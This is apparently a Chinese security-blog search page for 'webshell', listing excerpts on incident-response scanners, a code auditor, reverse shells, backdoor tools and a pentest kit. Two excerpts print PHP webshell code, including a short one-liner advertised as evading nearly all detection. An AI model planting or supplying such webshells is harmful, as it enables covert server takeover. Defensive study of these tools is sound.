搜索 “webshell”

GScan介绍 GScan是一个适用于安全应急响应人员对Linux主机排查时的安全工具。实现主机侧Checklist的全面自动化化扫描检测（包含常见检查项并可以自由扩展），根据检测结果自动数据聚合，进行黑客攻击路径溯源。 GScan界面 GScan Checklist扫描检查 GScan结果聚合保存 CheckList检测项 自动化程序的CheckList项如下： ...

之前给的过D盾一句话webshell现在都已被查杀，补个 <?php header('HTTP/1.1 404'); class ZXVG { public $c=''; public function __destruct() { $_0='&'^"\x47"; $_1='C'^"\x30"; $_2='A'^"\x32"; $_3='v'^"\x13"; $_4='J'^"\x38"; ...

Cobra介绍 Cobra是一款源代码安全审计工具，支持检测多种开发语言源代码中的大部分显著的安全问题和漏洞。 由于开发人员的技术水平和安全意识各不相同，导致可能开发出一些存在安全漏洞的代码。 攻击者可以通过渗透测试来找到这些漏洞，从而导致应用被攻击、服务器被入侵、数据被下载、业务受到影响等等问题。 “源代码安全审计”是指通...

PhpSploit Phpsploit 是一个远程控制框架，通过 HTTP 在客户机和 web 服务器之间提供隐蔽的交互式 shell 连接，能够为权限提升等目访问网络服务器。我们可理解为它是一款单webshell管理工具。 混淆通信是通过标准客户端请求下的 HTTP 头和 web 服务器的相对响应来完成的，通过一个一句话后门隧道: ...

一个可以绕过当前市面上几乎所有Webshell查杀的免杀PHP一句话木马脚本。 <?php /** * Noticed: (PHP 5 >= 5.3.0, PHP 7) * */ $password = "uedbox.com"; $wx = substr($_SERVER["HTTP_REFERER"],-7,-4); forward_static_call_array($wx."ert", array($_REQUEST[$password])); ?> ...

HideShell后门 HideShell是一个JSP后门木马，除了访问日志之外，还可以在Tomcat下隐藏任意JSP文件（实现隐藏webshell），隐藏访问日志。hideshell.jsp隐藏的JSP在下次重新引导Tomcat实例之前保持accessbile。 支持环境 Tomcat 7Tomcat 8 Hideshell.jsp通过简单删除目标来隐藏JSP文件，同时让Tomcat相信文件仍然存在，从而照常为...

什么是反弹shell reverse shell（反弹shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell 通常用于被控端因防火墙受限、权限不足、端口被占用等情形 假设我...

LinuxCheck介绍 LinuxCheck是一个linux信息搜集小脚本，主要用于应急响应，在Debian或Centos下都可使用，功能： 信息搜集（端口、网络、用户信息、登陆信息，iptables、各种环境变量或配置文件等）异常检测（大文件，最近改动文件，SSH key，crontab，以及Linux常见后门检测）rkhunter扫描php webshell扫描 LinuxCheck安装使用 ...

K8tools 渗透工具包 声明: 工具仅供安全研究或授权渗透，非法用途后果自负。 综合工具 [+] 综合工具 K8飞刀Final.rar[+] K8data.mdb K8飞刀漏洞数据库20190402[+] K8expList.txt K8飞刀漏洞利用列表 提权工具 [+] 提权工具 iislpe.exe IIS全版本提权(仅限IIS帐户、服务帐户)[+] 提权工具 pr.exe pr有参版 pr0无参版（巴西烤...